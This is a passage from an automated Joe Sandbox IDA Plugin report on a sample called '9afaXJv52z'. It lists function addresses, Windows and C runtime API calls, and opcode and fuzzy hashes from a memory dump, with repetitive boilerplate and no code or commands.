Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction ID: 0c622d953b7fd7819309b0f70532fa68b4a8c86eda66099bfc1e608a0668f8d7
Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
Instruction Fuzzy Hash: 15516F26A18641CAF710DF61D4503BD27A1FF69BA9F148539DE8D8B699DF38DC80CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BC07C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6850BC08B

Part of subcall function 00007FF6850BC24C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6850BC26E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6850BC0A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6850BC10E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6850BC161

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 79d1dce2d398f9716499937a06441436ffdde6278d394028c2c843f21c7e496b
Instruction ID: ffdcfe16643015ab80d81d188261cd482185230354e18083a468f85c0bb4261a
Opcode Fuzzy Hash: 79d1dce2d398f9716499937a06441436ffdde6278d394028c2c843f21c7e496b
Instruction Fuzzy Hash: 04310B11A0C243C1FA64BB6494913B92B91BF42FA4F98483DD94ED72D7DE2CBC44C613

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C5700 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C572D
CreateFileW.KERNELBASE ref: 00007FF6850C576C
CloseHandle.KERNEL32 ref: 00007FF6850C57A1

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
Instruction ID: c645e9a1275347da61e02584a3fc5c15c2102982c67d7b9935bbef0a4e8d7529
Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
Instruction Fuzzy Hash: 06418426D18782C3E7508B2096503696360FFA6B75F109338EA9C87AD5DF6CADE0C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C9FC0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6850C9FBC), ref: 00007FF6850C9FD1
TerminateProcess.KERNEL32(?,?,?,00007FF6850C9FBC), ref: 00007FF6850C9FDC
ExitProcess.KERNEL32 ref: 00007FF6850C9FEB

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction ID: 25e4b239b1fbea5791f2539b3a4730d9d88c23fe3c71fc4c820abfc2a1852cdf
Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
Instruction Fuzzy Hash: 6ED09214B08746C2EB282BB1589A0BC12667F8AF61F54193CD84BC6393DE2DAC4EC650

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C027C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C02C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C03B7

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: 4083fe992479ef905fb74edc1374c13de819b8690f2b2f3abdedb4992fdf0aeb
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: CA51D361B0A642C6FA28DE26941077E6685BF86FB8F244638DD6D877C5CF3CEC01C621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BBF90 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_set_fmode.LIBCMT ref: 00007FF6850BBFA7
_RTC_Initialize.LIBCMT ref: 00007FF6850BBFC8

Part of subcall function 00007FF6850C95A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C95D6

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: 8fe16d89185869baf5eab60e438c3c72e8fc46f5e9ebbf224ebf2c9926b5ce16
Instruction ID: 78e058b5a33fe81881bbf2870872a1beed77d0d9c63a11778c3a5c94ae91ca56
Opcode Fuzzy Hash: 8fe16d89185869baf5eab60e438c3c72e8fc46f5e9ebbf224ebf2c9926b5ce16
Instruction Fuzzy Hash: BB114950E18243C2FA2477B5599A2F91A817F95F74F44083CE94EC62C3EE1CBD81CA67

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CB11C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6850CAF99,?,?,00000000,00007FF6850CB04E), ref: 00007FF6850CB18A
GetLastError.KERNEL32(?,?,?,00007FF6850CAF99,?,?,00000000,00007FF6850CB04E), ref: 00007FF6850CB194

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction ID: 7ef36527324989a41cd15e925b1b08966fd146222aecb890c39a5a287a2385d7
Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
Instruction Fuzzy Hash: 5121AE21B18682C1FAA0976094942791292BF86FB4F88423DDE6EC73D6DF6CED45C221

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CC6F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6850CC88D), ref: 00007FF6850CC740
GetLastError.KERNEL32(?,?,?,?,?,00007FF6850CC88D), ref: 00007FF6850CC74A

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction ID: cbfff9723840ec40591233f8a6561e89f62efb22b37f373f71ee14aea82e4a16
Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
Instruction Fuzzy Hash: 69119D62A18A81C1EA108B25E5041696761FF45FF4F540339EEBD877E9CF7CD851C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C59FC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6850C5911), ref: 00007FF6850C5A2F
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6850C5911), ref: 00007FF6850C5A45

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
Instruction ID: c8d758ca5c317fa69603f41c50c190d111a52ad842544fd83a9f4ed588aaae56
Opcode Fuzzy Hash: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
Instruction Fuzzy Hash: CB11517260C646C6EB548B15A45113EB7A0FF95B71F500239EADDC5AD8EF2CD854CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C80BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6850C7F39), ref: 00007FF6850C80DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6850C7F39), ref: 00007FF6850C80F5

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
Instruction ID: 4ccefaf3f2cd3f202e0a46ede9bf4a2a2c355ccd6b95991d3d0296923919fc18
Opcode Fuzzy Hash: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
Instruction Fuzzy Hash: D5018E2250C295C2E7509F14A40127EB7B0FF82F71F60023AEAA9815E8DF3CD840DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CAF0C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF22
GetLastError.KERNEL32(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF2C

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction ID: f44a30729014fba6e75f4e2703a75eeb9093397b1dbea6511c29e537ffbb713d
Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
Instruction Fuzzy Hash: 72E0EC54F0D642C2FF19ABF2984617A1151BF99F62F44457CDD4EC6292DF3CAC86C620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C86A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF6850C86AC
GetLastError.KERNEL32 ref: 00007FF6850C86B6

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction ID: ed5fc2c095b70474736a6c5ef2a97436b531bcd982da6bcf50468bc956e787b8
Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
Instruction Fuzzy Hash: CDD0C914E19603C1E6142776084503911903F56F76F50063CC469C12E0DF6CAC459935

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C7E24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF6850C7E28
GetLastError.KERNEL32 ref: 00007FF6850C7E32

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction ID: 0f25906ee8d667ecee8d0298abfacebee3989b2fdeac513d72ed5bc554eb81f9
Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
Instruction Fuzzy Hash: E2D0C915F19603C1E6182BB1188503911903F5AF35F50077CC429C01E1DF2CAC898521

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B7D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

_findclose.LIBCMT ref: 00007FF6850B7F99

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: a8eec92fcd3b15b2131d1e03c4232d75d862536ce56818bce2d995f04c6387b6
Instruction ID: 4a77c8d37bd76340725d649f885c7ea5098636730f24a7992ffe2cd6dae5e229
Opcode Fuzzy Hash: a8eec92fcd3b15b2131d1e03c4232d75d862536ce56818bce2d995f04c6387b6
Instruction Fuzzy Hash: 6C71CC52E18AC5C2EA11DB2CC5452FD6360FBA9B9CF55E325CB8C52593EF28E6C9C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CC46C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850CC494

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction ID: 7def4568fab886e757a27168647210d799eb70352443898cb2b69dea302cd3ca
Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
Instruction Fuzzy Hash: D441AF72908241C7EA24DA29E5502797BA0FF56FA5F100239DA9EC36D1CF2DEC42C762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B82B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF6850B835A

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 295a09af8828371d6b51f996ef1a7ffb8e58ba036dc716bafaccf3d30419a292
Instruction ID: ad18a94a8bdc6ff788c2e2adee12f91cde8c5c1cc99461ea940b08953d7e529e
Opcode Fuzzy Hash: 295a09af8828371d6b51f996ef1a7ffb8e58ba036dc716bafaccf3d30419a292
Instruction Fuzzy Hash: EA21D321B08292C6FA60AA1264943BAA651BF45FE4F8C5438EE4D87796CF3CEC05C601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CBEFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850CBF82

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction ID: 6f0a0a92fb37b239c4cbf97b5c30a3f452ddcc782429152e7f34e9626009cf4b
Opcode Fuzzy Hash: 33c1c355f770a45dc32ec47b5556db51f5a056321d098f55ce731dda09118c74
Instruction Fuzzy Hash: 3B318B22A18602C5F651AB55884237C2A90BF92FB6F910139EA5DC73D2CF7CED42CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C9EF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6850C9F1F

Part of subcall function 00007FF6850CA018: GetModuleHandleExW.KERNEL32 ref: 00007FF6850CA03D
Part of subcall function 00007FF6850CA018: GetProcAddress.KERNEL32 ref: 00007FF6850CA053
Part of subcall function 00007FF6850CA018: FreeLibrary.KERNEL32 ref: 00007FF6850CA07A

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

